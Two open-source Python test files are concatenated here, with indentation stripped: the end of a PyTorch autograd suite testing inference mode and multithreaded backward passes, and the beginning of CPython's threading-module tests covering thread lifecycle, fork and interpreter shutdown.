# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument. So there isn't a mixed inference and normal
# tensor inputs for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since its equivalent as s.view(c.sizes()) which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
threads = []
for _ in range(num_threads):
p = threading.Thread(target=fn, args=(args))
p.start()
threads.append(p)
for p in threads:
p.join()
def test_simple_backward(self):
# simple multithreaded backward that create threads in the beginning of training
# and everything else is training separately, i.e. inputs, operations, etc.
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (i.e. This is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use functional grad() api, gradients will not
# be accumulate to the same place and should be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
# different threads and we need to ensure user specify retain_graph=True, otherwise
# error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will be success in this case, all other threads should raise
# with the error that throw to user to recommend them specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# result should equal to num_thread * gradients
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
if __name__ == '__main__':
run_tests()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
with self.assertWarnsRegex(DeprecationWarning, 'use is_alive()'):
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
